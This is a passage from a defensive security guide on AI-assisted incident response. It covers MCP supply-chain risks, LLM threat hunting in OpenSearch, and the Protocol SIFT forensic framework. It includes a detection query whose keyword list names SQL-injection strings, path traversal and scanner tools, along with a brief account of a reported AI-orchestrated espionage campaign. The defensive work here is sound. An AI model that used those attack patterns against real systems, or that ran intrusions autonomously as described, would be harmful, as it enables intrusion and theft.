MCP servers are often built by independent developers without established security standards. Users often install using the "pipe cURL to Bash" anti-pattern (the opposite of best practices), with no version pinning, signing, or package locking in the current specification. This creates a plugin-like ecosystem where unvetted code from GitHub repositories can gain access to sensitive data or local system capabilities.

GitHub repository README showing curl-pipe-to-shell installation commands for an MCP server package
Figure 27. Box.com MCP Server Installation Anti-Pattern

MCP server ecosystems introduce familiar supply chain risks, including typosquatting, impersonation, malicious updates for formerly safe code, and account takeovers of legitimate developers. Further, many MCP clients allow tools to update and run automatically for a seamless user experience, but this implicitly trusts tool developers and the integrity of installation sources, creating ongoing exposure to supply chain compromise.

Organizations adopting MCP should treat servers like packages with elevated privileges: audit before usage, apply least privilege to credentials, consider sandboxing servers with containerization and network egress controls, and maintain internal registries of vetted MCP servers to reduce exposure to unknown code.

MCP Integration for Threat Hunting

Despite MCP’s security concerns, many organizations are adopting this integration opportunity for AI models to leverage external applications, API servers, and data sources. One compelling use case is integrating log analysis platforms with MCP to enable natural-language threat-hunting queries.

For example, in one collection of web server logs, a query to identify common web server attack patterns (shown in Listing 16) returns a set of log events that can be further scrutinized by the analyst for indicators of compromise, as shown in the Figure 28. Writing this query requires knowledge of OpenSearch Lucene query syntax and an understanding of common web attack patterns.

NOTE: OpenSearch is an open-source fork of Elasticsearch and Kibana, created after Elastic changed its licensing model. While the platforms have diverged somewhat since the fork, OpenSearch retains much of the same query syntax and capabilities as Elasticsearch, enabling users to ingest, search, and analyze log data.

Listing 16. OpenSearch Lucene Web Log Threat Hunting Query Example
(http.response.status_code:(400 OR 401 OR 403 OR 404 OR 500) AND -source.address:"127.0.0.1") OR url.original:(*..* OR *%2e%2e* OR *passwd* OR *wp-admin* OR *phpMyAdmin* OR *shell* OR *eval* OR *base64*) OR url.original:(*union* AND *select*) OR url.original:(*%27* AND *OR*) OR url.original:(*SLEEP* OR *BENCHMARK* OR *information_schema*) OR user_agent.original:(*nikto* OR *sqlmap* OR *nmap* OR *masscan* OR *zgrab* OR *gobuster* OR *dirbuster* OR *wfuzz* OR *nuclei*) OR tags:(potential_attack OR scanner)
OpenSearch Dashboards showing Lucene query results with a histogram of HTTP error responses over two weeks
Figure 28. OpenSearch Lucene Web Log Threat Hunting Query Result

As an alternative, organizations can use the OpenSearch MCP server to integrate AI model capabilities with the OpenSearch cluster containing security logs. Using MCP, analysts can issue natural-language queries that the AI model automatically translates into OpenSearch queries.

Review the Apache logging data for the last two weeks. Provide insight into SQL injection attacks against my web servers, prioritizing results where the server returns a non-500 error.

We used Claude Desktop with MCP integration to query the OpenSearch cluster for Apache web server logs containing SQL injection attempts. For each MCP call, Claude Desktop prompted us to approve the generated OpenSearch query before execution, ensuring analyst oversight (human-in-the-loop or HITL) of automated queries, as shown in the Figure 29. After approving the query, Claude Desktop executed it against the OpenSearch cluster and returned summarized findings revealing attack patterns, as shown in the Figure 30.

Claude Desktop requesting approval to execute a raw OpenSearch query against the Apache access log index
Figure 29. Claude Desktop OpenSearch MCP Query Approval
Claude SQL injection analysis summary showing no SQLi evidence but listing path traversal and sensitive file discovery attempts
Figure 30. OpenSearch MCP Natural Language Threat Hunting Query Example

By connecting an MCP server to an OpenSearch cluster containing security logs, analysts can perform threat hunting using conversational queries rather than learning complex query syntax. This allows analysts who are less familiar with OpenSearch to leverage their threat hunting expertise without the barrier of mastering query languages. Further, analysts who are new to threat hunting can use natural language queries to explore log data and learn effective search patterns through model-generated queries.

IMPORTANT: Analysts should not rely solely on AI-generated queries without review. In our testing, Claude Opus did an excellent job reviewing data and designing queries to illustrate attack patterns; however, it did not comprehensively identify all attacks captured in the web server logs. Organizations can use MCP as an augmentation to analyst capabilities, but human expertise remains essential for comprehensive threat hunting.

In addition to abstracting the details of the query syntax from users, MCP integration allows the analyst to iteratively refine their search based on initial findings and to transform the findings into other formats. Through the integration of multiple MCP tools, analysts can build complex workflows that combine data retrieval, analysis, and reporting:

Take these results and produce a brief summary of the attack activity, followed by the detailed log entries in a table. Submit the data to JIRA as a new incident ticket assigned to the web security team with an appropriate title.

By integrating multiple MCP servers, a human analyst can more quickly perform many otherwise manual threat-hunting tasks, benefiting from consistent operational procedures while freeing up time for higher-value analysis and decision-making.

Forensic Analysis Acceleration with Protocol SIFT

AI systems are transforming many aspects of cybersecurity, including offensive and defensive operations. As attackers adopt AI to accelerate attack campaigns, defenders must evolve their investigative capabilities to maintain parity.

Autonomous Adversaries

A significant shift in attacker techniques has occurred with the emergence of AI-orchestrated intrusion campaigns, in which large language models execute substantial portions of the attack lifecycle with minimal human supervision. This represents a new class of threat for organizations where AI acts as an intrusion operator rather than merely as an assistant to human operators.

The implication of this evolving threat is that adversaries can increase both speed and scale of attacks through parallel reconnaissance, rapid iteration, and simultaneous delivery across many targets. Further, the required skill set for threat actors is reduced, lowering the barrier to entry for larger groups of threat actors to conduct sophisticated campaigns. This forces defenders to reconsider assumptions about the attacker’s dwell time, the speed of attack progression, and the amount of attacker labor required to run large campaigns.

In September 2025, Anthropic detected and disrupted what it assessed as the first documented case of a large-scale cyber espionage campaign executed largely without substantial human intervention. [8] The campaign, attributed to a Chinese state-sponsored group dubbed GTG-1002, targeted approximately thirty global organizations, including technology companies, financial institutions, chemical manufacturers, and government agencies. The attackers used Claude Code’s agentic capabilities to execute reconnaissance, vulnerability discovery and validation, exploitation, credential harvesting, and data collection. Anthropic stated that the Claude model performed roughly 80-90% of the operational work on behalf of the attackers, with humans mostly setting direction and making a small number of decisions at key moments.

Multi-phase attack architecture showing MCP server tools used for scanning and exploitation with human operator oversight
Figure 31. Anthropic GTG-1002 Threat Actor Campaign Architecture [9]

While Anthropic has not publicly released detailed forensic evidence or IOCs to support its claims (leading to some controversy about the veracity of the report [10]), the implications of AI-orchestrated campaigns are significant, and defenders should use this report as an early indicator of future threat actor capabilities.

Accelerating Forensic Investigations

For many organizations, investigative capabilities have not kept pace with the speed and scale of modern attacks. Attackers have always had an advantage in time-to-action, with forensic processes often requiring considerably longer to complete than the attack lifecycle itself. The use of autonomous AI by threat actors increases this gap to an untenable level, making manual forensic techniques insufficient for a timely response. When responding to AI-powered, autonomous attacks, responders need to adopt new approaches to maintain parity with threat actors' capabilities while maintaining the rigor required for forensic investigations.

Responding to this need is Protocol SIFT, a framework from the SANS Institute that addresses this challenge by integrating Claude Code’s agentic capabilities into the SIFT Workstation project. With Protocol SIFT, analysts can leverage Anthropic models to automate the use of hundreds of forensic utilities into an orchestrated system guided by natural-language instructions. This integration leverages the capabilities of LLM ReAct (Reasoning and Acting [11]) agents to provide autonomous investigative capabilities at accelerated speeds (see the sidebar ReAct Agents: Reasoning and Acting for Enhanced AI Capabilities).

Comparison diagram showing an analyst manually recalling forensic tool commands versus Claude Code automating timeline generation
Figure 32. Protocol SIFT Analyst Opportunity

The application of Protocol SIFT for forensic investigations represents a shift from tool execution to tool orchestration. Instead of analysts choosing tools, reading and re-reading documentation about tool use, struggling with complex command-line options, and troubleshooting errors, the analyst role shifts. Analysts describe investigative goals, and the ReAct agent determines the appropriate tool chain, executes commands iteratively, evaluates results, and adjusts its approach based on findings until the investigation objective is satisfied.

From Tool Use to Tool Orchestration

Traditional forensic analysis requires analysts to remember complex command-line syntax for hundreds of specialized tools. An analyst investigating a Windows compromise must know the precise flags for log2timeline.py to process event logs, the correct syntax for RECmd to parse registry hives, and how to filter results with psort.py. This cognitive overhead slows investigations and creates barriers for less experienced analysts.

Protocol SIFT transforms this workflow by embedding Claude Code within the SIFT terminal environment. Analysts state investigative intent in plain language, and the AI translates that intent into precise tool invocations. The analyst role shifts from memorizing syntax and running complex command-line tools to directing strategy and evaluating analysis results.

For example, supplying Protocol SIFT with a directory of evidence from a target system used as a target in a red team engagement, we issued the following prompt with Claude Code:

Use the forensics data included in /mnt/hgfs to build a timeline of activity for November 2025. Identify threats that indicate malicious activity against the system.

Claude Code on a SIFT Workstation prompting forensic timeline analysis of disk image data for November 2025
Figure 33. Claude Code Analysis Prompt on SIFT Workstation

Using Claude Code as an orchestrator, Protocol SIFT autonomously executed a multi-step forensic workflow:

  • Identified the assets available in the /mnt/hgfs directory for analysis as VMware Workstation files.

  • Examined VMware artifacts (logs, screenshots, disk images, memory dumps) to scope the investigation.

  • Mounted VMDK virtual disk image using qemu-nbd for read-only file system analysis.

  • Identified malware samples (AnalyticsInstaller.exe, analytics.exe) and decoded embedded payloads using strings and base64.

  • Analyzed Windows memory dump using strings to recover evidence of Meterpreter execution, Mimikatz usage, and network activity.

  • Parsed Windows Event Logs (Security, PowerShell Operational) using evtxexport to correlate execution events.

  • Reviewed Prefetch files to establish program execution timeline for November 27, 2025.

  • Documented attack chain, persistence mechanisms, and compiled Indicators of Compromise (IOCs).

After several minutes, the model produced a detailed forensics report summarizing findings, including a timeline of malicious activity on November 27, 2025, as shown in Table 6.

Table 6. Protocol SIFT Timeline of Malicious Activity
Timestamp Event Evidence Source

15:55:26

VM powered on

VMware log

15:56:XX

System boot, user login

Prefetch (explorer.exe, winlogon.exe)

15:57:XX

Process Monitor launched for malware analysis

Prefetch (PROCMON64.EXE)

15:58:XX

analytics.exe executed (malicious payload)

Prefetch (ANALYTICS.EXE-DD592902.pf)

16:23:XX

AnalyticsInstaller.exe executed (malware dropper)

Prefetch (ANALYTICSINSTALLER.EXE-E57CE4F0.pf)

16:23:XX

cmd.exe spawned by malware

Prefetch, Memory dump

16:23:XX

PowerShell executed with encoded command

Prefetch (POWERSHELL.EXE)

16:33:XX

Screenshot captured via Snipping Tool

Prefetch (SNIPPINGTOOL.EXE)

Claude Code forensic analysis output showing system information and a malicious activity timeline with timestamps and evidence sources
Figure 34. Protocol SIFT Forensic Findings

The combination of natural language direction, autonomous tool orchestration, and iterative reasoning allows Protocol SIFT to accelerate forensic investigations significantly, allowing analysts to focus on strategic decision-making rather than low-level tool operation.

ReAct Agents: Reasoning and Acting for Enhanced AI Capabilities

Protocol SIFT’s autonomous capabilities derive from the ReAct (Reasoning and Acting) agent architecture, a paradigm that combines Chain of Thought reasoning with external tool interaction to improve AI model capabilities on complex tasks.

The ReAct Framework

Traditional language models generate responses based solely on their training data, limiting them to the knowledge captured during training and preventing interaction with external systems. ReAct agents overcome these limitations by interleaving reasoning steps with actions that interact with the external environment. The ReAct cycle operates through three phases:

  • First, the agent receives a task and reasons about how to approach it, breaking complex objectives into manageable steps.

  • Second, the agent takes an action such as executing a command, searching the web, or calling an API, using available tools.

  • Third, the agent observes the results of that action and incorporates the findings into its reasoning for the next iteration.

Circular ReAct workflow diagram showing reasoning and planning followed by action and observation steps for forensic analysis
Figure 35. Protocol SIFT ReAct Workflow Diagram

This cycle repeats until the agent determines the task is complete or requires human intervention.

Chain of Thought Reasoning

Chain of Thought (CoT) prompting enables models to solve complex problems by generating intermediate reasoning steps rather than jumping directly to conclusions. When analyzing forensic evidence, a ReAct agent might reason: "To build a timeline, I need to parse temporal artifacts using Plaso’s log2timeline.py from a disk image. I need to identify the format of the disk image first."

This explicit reasoning makes the agent’s decision process transparent and allows it to recognize when it lacks necessary information or when initial approaches fail.

Action Capabilities

ReAct agents interact with external environments through defined actions. In Protocol SIFT, these actions include executing forensic tools from the terminal, reading file contents to understand the evidence structure, searching documentation when unsure about tool syntax, and requesting human approval before potentially dangerous operations.

Actions can go far beyond command execution, too. For example, a ReAct agent can search the web for threat intelligence about malware signatures, retrieve and parse CTI reports to understand attack patterns, and integrate that external knowledge into its analysis alongside findings from local log data.

Model Context Protocol Integration

MCP provides the standardized interface that allows ReAct agents to interact with external tools and other data sources. Through MCP, Protocol SIFT can orchestrate local forensic utilities on the SIFT Workstation, connect to remote systems via SSH for distributed evidence collection, query threat intelligence feeds for indicator enrichment, and interact with specialized analysis platforms, such as malware sandboxes.

This extensibility means organizations can add new capabilities to Protocol SIFT by implementing MCP servers that expose internal tools or proprietary forensic capabilities, allowing the ReAct agent to incorporate these resources into its investigative workflows. For example, if an organization has a SIEM platform that is useful to query for scoping during investigations, the SIEM-specific MCP server can expose search capabilities, allowing the ReAct agent to retrieve relevant log data as part of its analysis.

Accuracy and Deep Understanding

The ReAct architecture improves accuracy through several mechanisms. Iterative refinement enables the agent to test hypotheses, evaluate results, and adjust its approaches when initial attempts fail. External tool verification grounds findings in deterministic tool output rather than in model inference, reducing the risk of hallucination. Web access provides access to current information beyond the model’s training cutoff date. Transparent reasoning displayed during the model’s analysis allows analysts to understand and verify the decision-making process.

In forensic applications, these improvements translate to greatly accelerated analysis that can still be validated by human analysts. The combination of reasoning capabilities, access to external tools, and iterative problem-solving makes ReAct agents particularly well-suited for complex investigative tasks we need to solve, where the path to a solution is not immediately obvious and may require multiple approaches before achieving success.

Trust Mechanisms in Autonomous Forensics

Trust in forensic findings is essential, not just for legal defensibility, but also for organizational confidence in incident response decisions. Autonomous AI systems offer significant opportunities for speed and scale, but they also raise concerns about evidence integrity, reproducibility, and the potential for AI hallucinations to contaminate findings. Protocol SIFT implements multiple layers of control to ensure it produces valid forensic assessment results.

The use of autonomous AI in forensic investigations raises significant concerns about evidence integrity, reproducibility, and legal defensibility. The nature of AI non-determinism creates challenges for forensic soundness, as findings must be verifiable and reproducible to withstand legal scrutiny. At the time of this writing, these are active areas of research and debate within the digital forensics community, and early adopters should carefully consider the implications of AI integration on their forensic practices.
Inference Constraint

Inference constraints define how much the AI model interprets versus how much information is generated by deterministic tools. Protocol SIFT maintains high inference constraint by limiting Claude Code to tool orchestration rather than evidence interpretation.

Instead of asking the model to directly interpret binary data or to guess file contents, Protocol SIFT constrains the AI model to invoke vetted SIFT utilities for evidence analysis. For example, when analyzing a registry hive, Protocol SIFT provides RECmd [12], a well-known and trusted tool, to parse the binary structure of registry data and produce structured output. The model uses the tools vetted for inclusion in SIFT to extract the data for subsequent interpretation.

This approach helps to limit hallucinations that would otherwise contaminate the evidence analysis results. The AI cannot fabricate registry keys or invent timeline entries because it only works with output from deterministic parsing tools.

Human in the Loop (HITL)

Protocol SIFT implements mandatory human checkpoints for critical operations. By default, the system operates in read-only mode and prompts analysts for permission before executing any command that could alter the system or evidence.

Before running commands, Protocol SIFT displays the exact syntax it will execute and asks for approval. This visibility allows analysts to verify correctness and maintain audit trails showing which commands were executed and when approval was granted.

Analysts can configure allowlists for common read-only tools like fls, icat, or exiftool to streamline workflows without compromising control. Commands that write data, modify files, or alter system state always require explicit approval.

Forensically Sound Tools

Protocol SIFT orchestrates only well-established, vetted forensic utilities included in the SIFT Workstation. Tools like The Sleuth Kit, the Volatility Framework, and Eric Zimmerman’s utilities have established track records in legal proceedings and undergo continuous community validation.

When Protocol SIFT generates a timeline, the timeline comes from log2timeline.py, not from AI interpretation. When parsing registry hives, RECmd performs the actual parsing. The AI determines which tools to run and in what order, but evidence generation remains the domain of trusted deterministic utilities.

This architecture ensures that findings can be reproduced by running the same commands manually, maintaining forensic defensibility while gaining the benefits of automation.

Auditability and Documentation

All Protocol SIFT operations generate detailed audit logs documenting the investigative workflow. Logs capture the model version, analyst prompts, generated commands, tool output, and approval decisions. This documentation supports legal review and allows reconstruction of the analytical process.

Investigators can demonstrate exactly which tools were invoked, what parameters were used, and how conclusions were derived from tool output. This transparency addresses judicial concerns about AI involvement in evidence analysis.

For example, in our earlier investigation of the Windows system using VMware virtual disk evidence, the audit log captured every command Claude Code generated, the analyst approvals granted, and the output from each tool in the ~/.claude/projects directory tree. JSON files capture each step of the ReAct reasoning process, allowing reviewers to trace how the model arrived at each decision. An example of an audit log entry is included in Listing 17, with the tool output also captured alongside the logging entry.

Listing 17. Claude Code Audit Log Example
"message": {
  "model": "claude-opus-4-5-20251101",
  "content": [
    {
      "type": "thinking",
      "thinking": "Found Windows event logs. There's also a procmon.png on the desktop which could be a screenshot of process monitor showing malicious activity. Let me:\n1. View the procmon.png\n2. Check the live Windows event logs\n3. Look for PowerShell history\n4. Use hayabusa to analyze the event logs",
    } (1)
  ],
},
// [...] omitted for brevity
"message": {
  "model": "claude-opus-4-5-20251101",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01LHyUN5JiNoGc4PnCkKqiYQ",
      "name": "Bash",
      "input": {
        "command": "find /mnt/windows/Users/Sec504 -name \"*PowerShell*\" -o -name \"*history*\" -o -name \"ConsoleHost_history.txt\" 2>/dev/null", (2)
        "description": "Find PowerShell history files"
      }
    }
  ],
}
1 JSONL output edited for brevity.
2 Example command generated by Claude Code to locate PowerShell history files.

These trust mechanisms work together to enable analysts to leverage autonomous operation while meeting forensic soundness requirements. Analysts gain speed and scale advantages without sacrificing the auditing, verification, and reproducibility needs essential for legal proceedings.

Operational Considerations

Effective AI integration into incident response requires attention to verification practices, documentation standards, and ongoing skill development. In this section, we’ll examine how these factors shape the practical use of AI in forensic workflows.

Verification and Trust

AI output requires verification before action or documentation as factual conclusions. This principle applies regardless of how confident or authoritative the AI response appears.

Verification approaches vary by use case. Log analysis verification requires manually confirming that identified patterns exist in source data. If AI claims to detect beaconing behavior at five-minute intervals, analysts should examine the timestamps directly to verify this pattern is present. Timing calculations should be confirmed since models sometimes struggle with precise numerical reasoning. Pattern identification is a hypothesis that requires evidence-based confirmation.

Report drafts generated by AI should have every factual claim checked against source evidence. Quotes and statistics, in particular, require verification, since models may alter wording or combine statistics from different contexts. An AI-generated executive summary should preserve the accuracy of technical findings while changing only presentation style and technical depth.

Playbooks generated by AI should be tested where possible before operational use. Subject matter experts should review the technical accuracy of procedures, commands, and tool references. An untested AI-generated playbook may contain syntactically incorrect commands, reference nonexistent features, or recommend procedures inappropriate for the organizational environment.

Documentation should capture verification performed for significant findings. Stating "AI-assisted analysis identified X, verified by [manual review/testing/SME confirmation]" maintains transparency about how conclusions were reached. This transparency supports both immediate trust in findings and future review if conclusions are questioned.

Documentation Practices

When AI assists in analysis, documentation should reflect this contribution and the verification performed.

Incident documentation should note when AI tools were used and for what purpose. This notation allows reviewers to distinguish which findings resulted from AI assistance and which from traditional analysis methods. For example, "Code analysis performed using AI-assisted deobfuscation, findings verified through execution in an isolated environment" provides clear provenance for the document audience.

Verification steps for AI-generated findings should be documented with the same rigor as for any analytical tool output. When AI identifies a pattern in log data, documentation should state "Pattern identified by AI analysis, manually confirmed in logs from [timestamp range]." This documentation supports challenges to findings by making the verification basis explicit.

AI interaction logs should be preserved where they contributed to significant conclusions. These logs serve as a record of analytical reasoning similar to analyst notes from manual investigation. If an AI conversation reveals a critical insight into malware functionality, it should be retained as part of the investigation record.

Review the documentation for your AI platform to understand the available logging and export options. Several platforms provide conversation export features that facilitate record-keeping, or agent frameworks may log interactions automatically (such as Claude Code, which stores project histories in local files as discussed in Section 1.5.2.4).

Documentation should distinguish between AI-suggested hypotheses and verified findings. AI might suggest that observed behavior indicates data exfiltration based on network traffic volume, but this hypothesis requires confirmation through detailed traffic analysis. Documenting which claims are AI hypotheses and which are verified findings prevents confusion during review or legal proceedings.

This documentation approach supports three critical needs: reproducibility, defensibility, and continuous improvement.

  • Reproducibility allows others to understand how conclusions were reached, following the analytical path from evidence through AI assistance to verified findings.

  • Defensibility ensures that if findings are challenged, the basis and verification are clear rather than relying on assertions about AI capabilities.

  • Continuous improvement is possible by reviewing AI-assisted work to refine prompts and identify where AI adds value and where traditional methods remain superior.

Documentation is seldom a favorite task for analysts, but maintaining high standards in how we build documentation is essential for defensible, trustworthy incident response.

Building Organizational Capability

AI integration benefits from deliberate skill development and consistent deployment throughout the organization, rather than ad hoc adoption. At the time of this writing, using AI models for incident response is still a relatively new practice, and few organizations have mature processes for consistent AI use as part of their incident response process. While one analyst can significantly accelerate their work through AI assistance, organizational benefits grow exponentially when team members share effective practices and build collective capability across the organization.

In this section, we’ll explore several practices that help organizations leverage AI for incident response across the team for greater impact.

Prompt Libraries

Teams should develop and maintain collections of effective prompts for common tasks. When an analyst creates a prompt that consistently produces useful results, it becomes a reusable asset. Successful prompts should be shared across the team, reducing duplication of effort and accelerating capability for analysts who have not yet developed equivalent prompts.

Sharing prompts helps accelerate team capability by providing starting points for less experienced analysts and as inspiration for further refinement and continued development. For example, a prompt that effectively guides AI-assisted malware code analysis can serve as a template for other analysts to adapt for different malware families or analysis contexts, and serves as an excellent learning tool for how less experienced analysts can structure their prompts for better results.

Skill Files and Prompt Library Integration

Prompt libraries can be stored in shared documents, wikis, or version-controlled repositories, but they can be integrated more quickly when embedded in AI platforms that support custom prompt templates. Skills files are commonly used in Claude Code, OpenAI Codex, and Gemini CLI to define reusable prompt structures that analysts can select when initiating new analysis tasks. By embedding prompts into the AI platform, organizations reduce the friction analysts face when accessing effective prompts, increasing the likelihood of consistent use.

For my Claude Code environment, I maintain several skills for specific tasks that I will reuse frequently. For example, I have a Sigma detection rule generation skill that I use to create Sigma rules from analyst descriptions of observed behavior, as shown in Listing 18.

Listing 18. Claude Code Skill File Example
$ pwd
/Users/jwright/forensics
$ cat .claude/commands/sigma.md
---
description: Generate Sigma detection rules from attack descriptions or observed artifacts
---

Generate Sigma detection rules from analyst input: behavior descriptions, observed artifacts, or MITRE ATT&CK technique references.

## Process

1. **Parse input** to identify log source, detection fields, and attack context
2. **Map to log source** using the table below
3. **Build detection logic** with selection criteria, optional filters, and condition
4. **Generate complete YAML** with metadata, tags, and false positive notes
5. **Provide context** including conversion commands for target SIEMs

Use defaults when not specified: status `experimental`, level `medium`, author `Falsimentis IR Team`.

## Log Source Reference

| Behavior | Product | Category |
|----------|---------|----------|
| Process execution | windows | process_creation |
| PowerShell | windows | ps_script |
| File events | windows | file_event |
| Registry | windows | registry_event |
| Network | windows | network_connection |
| Linux processes | linux | process_creation |
| AWS | aws | cloudtrail |

## Output Template

```yaml
title: <Descriptive title>
id: <UUID>
status: experimental
description: <Detection purpose>
references:
    - <MITRE ATT&CK or relevant URL>
author: IR Team
date: YYYY/MM/DD
tags:
    - attack.<tactic>
    - attack.<technique_id>
logsource:
    product: <product>
    category: <category>
detection:
    selection:
        <field>: <value>
    condition: selection
falsepositives:
    - <Legitimate scenarios>
level: medium
```

## Example

**Input**: `/sigma outlook.exe spawning cmd.exe or powershell.exe`

```yaml
title: Email Client Spawning Command Shell
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Outlook spawning command interpreters, indicating possible malicious attachment execution.
references:
    - https://attack.mitre.org/techniques/T1204/002/
author: IR Team
date: 2025/01/24
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\outlook.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate Outlook add-ins
level: high
```
This skill is available at https://urls.sec504.org/sigmaskill.

When I need to create a new Sigma rule, I can invoke this skill using the /sigma command (matching the skill Markdown file name) and supply the context for the desired Sigma rule:

/sigma Process created cmd.exe spawning from outlook.exe with command line containing "http"

The model then generates a complete Sigma rule based on the input, as shown in the Figure 36.

Claude Code generating a Sigma detection rule for Outlook spawning cmd.exe with HTTP URLs in the command line
Figure 36. Claude Code Sigma Rule Generation Example

Sharing and reusing effective prompts through prompt libraries and skill files accelerates team capability and promotes consistent AI usage across the organization. When the organization reduces friction in adopting and consistent use, analysts are more likely to regularly integrate AI assistance into their workflows.

Use Case Documentation

Documentation should capture which AI applications have proven valuable and which have not worked well in specific organizational environments for internal distribution. Not every AI use case succeeds in every context. Recording what worked (and what did not) helps teams focus effort on high-value applications rather than repeatedly attempting approaches that have already proven ineffective. This documentation also helps new team members quickly understand organizational AI practices.

Training

Team members should understand both the capabilities and limitations of AI tools through structured training rather than relying solely on informal experimentation. Practical exercises build intuition for effective use. Training scenarios might include analyzing malware samples with AI assistance, generating incident reports from investigation notes, or troubleshooting common prompt issues. Hands-on practice reveals where AI adds value and where traditional methods remain superior.

Structured Learning Paths

Effective AI training follows a progressive structure that builds skills incrementally, a learning theory known as scaffolding. Initial training should cover fundamental concepts: how large language models work, common failure modes like hallucination, and basic prompt construction techniques. Intermediate training introduces domain-specific applications such as log analysis, code review, and report generation. Advanced training addresses complex scenarios, including multi-step analysis chains, API integration, and prompt optimization for specialized tasks.

Organizations should not assume that general AI familiarity translates into effective security applications. An analyst who uses AI for personal productivity may still struggle to apply it effectively to malware analysis or threat intelligence synthesis. Security-specific training bridges this gap by demonstrating how AI capabilities map to incident response workflows.

Practical Training Exercises

Hands-on exercises often provide the fastest route to effective learning. Consider the training scenarios organized by skill level as shown in Table 7. These exercises cover foundational, intermediate, and advanced skills, helping analysts build confidence progressively.

These exercises work well in a lab environment where analysts can experiment without the pressure of production time.
Table 7. Suggested Training Exercises for AI-Assisted Incident Response
Level Exercise

Foundational

Provide analysts with a simple obfuscated script and have them develop prompts that successfully decode it, comparing different prompt approaches and their results

Foundational

Give analysts a set of log entries containing an obvious attack pattern and have them craft prompts that identify the malicious activity

Foundational

Have analysts generate an executive summary from a provided technical incident report, then critique the AI output for accuracy and completeness

Intermediate

Present a more complex malware sample requiring multi-stage analysis, where analysts practice breaking the problem into sequential prompts

Intermediate

Provide sanitized case notes from a real incident and have analysts generate a draft incident report, then compare results across the team

Intermediate

Have analysts create detection rules from threat intelligence reports, verifying the rules against known-good and known-bad samples

Advanced

Challenge analysts to analyze an unfamiliar log format, developing prompts that help them understand the structure and identify anomalies

Advanced

Present a scenario requiring integration of multiple data sources (logs, network captures, memory artifacts) and have analysts develop an analysis workflow using AI assistance at appropriate stages

Advanced

Have analysts attempt to make AI produce incorrect analysis through adversarial prompting, building intuition for verification requirements

Cross-Training Considerations

AI training should not be isolated to a specialized AI team. When only certain analysts understand AI capabilities, the organization cannot leverage these tools consistently across all incidents. Cross-training ensures that AI assistance is available regardless of which analyst is assigned to a case.

Consider pairing experienced AI users with analysts who are developing their skills. This mentorship approach accelerates learning while distributing knowledge across the team. Senior analysts can share effective prompts, demonstrate troubleshooting techniques, and help newer team members develop intuition for when AI assistance adds value.

Technical understanding of AI models is important, but equally critical is developing the creativity and openness to experimentation and failure that drives learning.

Structured AI training improves the organization’s overall incident response capability. Teams that build systematic training programs develop consistent, reliable AI practices rather than depending on individual experimentation that may or may not transfer to other analysts. By investing in the consistent adoption of AI tools, organizations position themselves to benefit from accelerating capabilities across the team rather than being limited to a few early adopters.

Looking Forward

Generative AI capabilities continue to evolve rapidly. The specific techniques described in this chapter reflect current best practices, but those practices will develop as models improve and integration options continue to expand.

Several trends merit attention as organizations plan AI integration strategies. First, models are becoming more capable at complex, multi-step analysis. Tasks that currently require careful prompting may become straightforward as reasoning capabilities continue to improve. Analysts should periodically revisit prompts that require extensive structure to determine whether simpler approaches now produce equivalent results.

Agent tool integration standards, such as MCP, are maturing, making AI integration with security tools more accessible. Broader platform support and easier deployment will reduce the implementation burden for MCP-connected workflows. Organizations currently unable to justify custom integration development may find that turnkey solutions become available as the ecosystem matures. Commercial solutions will continue to emerge that embed AI capabilities into existing security platforms, reducing the need for custom development.

Security-focused models trained specifically for cybersecurity tasks may offer improved performance for incident response applications. Specialized models such as Cisco’s Foundation-sec-8b are purpose-built to understand cybersecurity language and workflows, with claims of reduced hallucination and improved performance on security benchmarks compared to general-purpose models of similar size. [13] These small language models (SLMs) may provide cost-effective alternatives to large general-purpose models for specific security tasks in minimally resourced local hosting environments, with the trade-off of reduced versatility outside their training domain.

The fundamental principles, however, remain stable:

  • AI accelerates analysis but does not replace human judgment.

  • Verification remains essential regardless of model capability.

  • Organizational policies should govern what data can be shared with AI platforms.

  • Documentation should reflect how conclusions were reached.

Attackers are adopting AI to accelerate their operations. Defenders who leverage AI effectively can maintain or improve response times despite increasing attack sophistication. The goal is to identify practical AI applications that reduce the time and effort required to protect organizational assets.

Analysts who develop fluency with AI tools, understanding both their capabilities and limitations, will be increasingly valuable as these technologies become standard elements of security operations. The competitive advantage goes not to teams that adopt AI first, but to teams that integrate AI thoughtfully while maintaining the verification rigor and analytical skepticism that separate good incident response from performance theater. Experimentation, practice, and continuous learning position teams to leverage AI effectively as capabilities continue to advance.


1. Anthropic, "Updates to our Consumer Terms," www.anthropic.com/news/updates-to-our-consumer-terms
2. Narayanan, A., & Shmatikov, V., "How to Break Anonymity of the Netflix Prize Dataset," arXiv preprint arXiv:cs/0610105, October 2006, arxiv.org/abs/cs/0610105
3. Incident Response Playbook Generation Structured Prompt, gist.github.com/joswr1ght/e3902b170b08396fd2b4c46500a56498
4. Hague, Sabastian, "A step-by-step guide to writing incident response reports," Hack The Box, www.hackthebox.com/blog/writing-incident-response-report-template
5. Zeltser, Lenny, "Good IR Reports with AI," zeltser.com/good-ir-reports-with-ai
6. Hague, Sabastian, "A step-by-step guide to writing incident response reports," Hack The Box, www.hackthebox.com/blog/writing-incident-response-report-template
7. Twine - An open-source tool for telling interactive, nonlinear stories, twinery.org/
8. Anthropic, "Disrupting the first reported AI-orchestrated cyber espionage campaign," November 2025, www.anthropic.com/news/disrupting-AI-espionage
9. Anthropic, "Disrupting the first reported AI-orchestrated cyber espionage campaign" (PDF report), November 2025, assets.anthropic.com/m/ec212e6566a0d47/original/Disrupting-the-first-reported-AI-orchestrated-cyber-espionage-campaign.pdf
10. Janssen, Jan-Keno, "Autonomous AI Cyberattack: Doubts about Anthropic’s Investigation," Heise Online, November 2025, www.heise.de/en/news/Autonomous-AI-Cyberattack-Doubts-about-Anthropic-s-Investigation-11080298.html
11. Yao, Shunyu et al., "ReAct: Synergizing Reasoning and Acting in Language Models," ICLR 2023, openreview.net/forum?id=WE_vluYUL-X
12. RECmd - Registry Explorer Command Line Tool, github.com/EricZimmerman/RECmd
13. Singer, Yaron, "Foundation-sec-8b: Cisco Foundation AI’s First Open-Source Security Model," Cisco Blogs, April 2025, blogs.cisco.com/security/foundation-sec-cisco-foundation-ai-first-open-source-security-model